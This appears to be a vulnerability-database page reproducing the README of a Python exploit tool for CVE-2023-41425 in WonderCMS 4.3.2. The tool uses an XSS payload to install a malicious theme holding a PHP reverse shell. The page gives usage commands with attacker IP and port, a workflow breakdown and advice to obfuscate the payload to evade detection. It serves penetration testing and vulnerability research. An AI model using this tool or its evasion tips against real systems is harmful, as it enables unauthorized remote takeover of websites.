来源

关联漏洞

描述

Automates creation and hosting of a JavaScript XSS payload to install a malicious theme module, triggering a reverse shell via Remote Code Execution in WonderCMS. This tool uses PentestMonkey's PHP reverse shell script as the payload

介绍

# 🚨 WonderCMS RCE Exploit Tool (CVE-2023-41425)

This Python-based offensive security tool automates the exploitation of a **Remote Code Execution (RCE)** vulnerability in **WonderCMS 4.3.2**, specifically **CVE-2023-41425**. It streamlines the process of crafting a malicious ZIP theme module and delivering a JavaScript-based **XSS payload** to hijack an admin session and deploy a PHP reverse shell.

> ⚠️ **For educational and authorized security testing purposes only.**

---

## 📚 Table of Contents

- [⚙️ Features](#️-features)
- [📥 Installation & Requirements](#-installation--requirements)
- [🚀 Usage Examples](#-usage-examples)
- [🧾 Argument Reference](#-argument-reference)
- [🧠 Detailed Workflow](#-detailed-workflow)
- [🔐 Security Notes](#-security-notes)
- [📝 License & Attribution](#-license--attribution)

---

## ⚙️ Features

- Generates a weaponized ZIP archive with embedded PHP reverse shell
- Crafts a JavaScript-based XSS payload to hijack admin sessions
- Extracts CSRF tokens and automates the module installation process
- Spins up a local HTTP server to host exploit files
- Compatible with Kali Linux, ParrotOS, and Python 3.6+

---

## 📥 Installation & Requirements

### 🔧 Requirements

- Python **3.6+**
- Compatible with Linux and macOS
- Tested on Kali Linux

### 📦 Dependencies

The script relies only on Python’s standard library. No external packages required.

### 🛠 Installation

#### UNIX
```bash
wget https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2/archive/refs/heads/main.zip

unzip main.zip

cd CVE-2023-41425-RCE-WonderCMS-4.3.2-main
```
#### Windows
```shell
git clone https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2.git

cd ./CVE-2023-41425-RCE-WonderCMS-4.3.2
```
---

## 🚀 Usage Examples

### 💻 Bash

```bash
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r reverseShell.php
```

### 🪟 PowerShell (WSL recommended)

```powershell
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r ./reverseShell.php
```

---

## 🧾 Argument Reference

| Argument         | Required | Description                                                         | Default         |
|------------------|----------|---------------------------------------------------------------------|-----------------|
| `-u`             | ✅       | Target WonderCMS login URL (e.g., `http://target/index.php?...`)   | —               |
| `-H`, `--host`   | ✅       | Attacker’s IP address (for reverse shell)                           | —               |
| `-p`             | ✅       | Attacker’s listening port                                           | —               |
| `-r`, `--reverse-shell` | ✅ | Path to the PHP reverse shell script                              | —               |
| `--dir-name`     | ❌       | Directory inside ZIP theme archive                                 | `TeaOn`         |
| `--http-port`    | ❌       | Port for local HTTP server                                         | `3000`          |
| `--zip-name`     | ❌       | Name of the generated ZIP file                                     | `reverse-shell` |

---

## 🧠 Detailed Workflow

Here’s a breakdown of what the script does under the hood:

1. **Argument Parsing**:
   - Uses `argparse` to collect required and optional inputs from the attacker.

2. **Reverse Shell Preparation**:
   - Reads the provided PHP reverse shell.
   - Replaces `$ip` and `$port` placeholders with the supplied `-H` and `-p` values.

3. **Malicious ZIP Creation**:
   - Creates a directory structure like: `<dir_name>/<php_reverse_shell.php>`.
   - Compresses it into `<zip_name>.zip`.

4. **XSS Payload (`script.js`) Generation**:
   - Extracts CSRF token from target login page via DOM parsing.
   - Constructs the module installation URL with the hosted ZIP.
   - Installs the malicious theme, triggering the reverse shell.

5. **Instructions & Exploit Hosting**:
   - Outputs the `nc` listener command.
   - Shows the full XSS delivery URL.
   - Launches a simple HTTP server to host both the ZIP and JS files.

---

## 🔐 Security Notes

- 🧹 **Cleanup**: Always remove generated ZIPs, JS payloads, and HTTP server logs after use.
- 👀 **Detection**: Exploit may be logged by WonderCMS or detected by WAFs.
- 🧪 **Test Responsibly**: Only target systems you are explicitly authorized to test.
- 🔒 **Harden Reverse Shells**: Consider obfuscating or encrypting the PHP payload to evade detection.

---

## 📝 License & Attribution

This tool is provided under the [MIT License](LICENSE).  
Crafted with 🔥 by TeaOnHack🧋.  

- CVE Reference: [CVE-2023-41425](https://nvd.nist.gov/vuln/detail/CVE-2023-41425)
- WonderCMS: https://www.wondercms.com/

> This project is intended for **educational and authorized security assessments only**. The author is not responsible for any misuse or damage caused by this tool.

文件快照

 [4.0K]  /data/pocs/fb30564eaebb8f24cef06dff5354cce8607c2f5c
├── [7.4K]  exploit_CVE-2023-41425.py
├── [1.0K]  LICENSE
├── [5.0K]  README.md
└── [2.6K]  reverseShell.php

0 directories, 4 files

备注